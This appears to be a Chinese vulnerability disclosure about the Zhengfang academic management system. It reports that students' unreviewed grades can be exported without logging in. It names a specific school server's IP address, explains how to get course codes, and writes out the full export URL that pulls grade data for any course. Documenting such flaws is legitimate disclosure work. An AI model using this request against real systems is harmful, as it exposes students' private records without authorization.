正方教务管理系统 可直接查询教师提交但教务处未审核的成绩

### 简要描述： 可直接查询教师提交，但教务处未审核的成绩。无需登录，可查询全校所有学生。 ### 详细说明： 如该学校教务管理系统地址为1.85.16.39 ： 先获取到某学科的课程代码， 在个人信息-信息发送-查看源文件里 [<img src="https://images.seebug.org/upload/201301/23223647c94a31ddf7c4d9bf0fbe387d656a0f73.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23223647c94a31ddf7c4d9bf0fbe387d656a0f73.jpg) [<img src="https://images.seebug.org/upload/201301/23223805bb94821c566484c612f4bae99b29c1e9.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23223805bb94821c566484c612f4bae99b29c1e9.jpg) 然后把获取的代码替换到下面的地址里即可下载 http://1.85.16.39/toexcel_PrintDialog.aspx?kc=此处填写课程代码&tab=jxrwb_lsb&psb=30&qzb=0&qmb=70&syb=0&cjxn=2012-2013&cjxq=1&kclx=必修课 [<img src="https://images.seebug.org/upload/201301/23223936a4986ce6076c79d317d900ba527761aa.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23223936a4986ce6076c79d317d900ba527761aa.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201301/23224146d6de19f183c7288e18079714356b74a5.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23224146d6de19f183c7288e18079714356b74a5.jpg)